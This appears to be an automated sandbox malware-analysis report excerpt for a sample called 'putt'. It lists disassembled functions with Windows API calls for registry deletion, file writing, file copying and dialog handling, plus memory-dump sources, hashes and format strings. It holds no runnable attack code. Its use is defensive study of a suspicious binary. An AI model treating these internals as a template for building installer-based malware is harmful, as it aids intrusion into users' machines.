                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                              Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                              Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00634E08), ref: 00402387
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                              Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                              Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                              Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                              Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                              • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                              Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                              Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
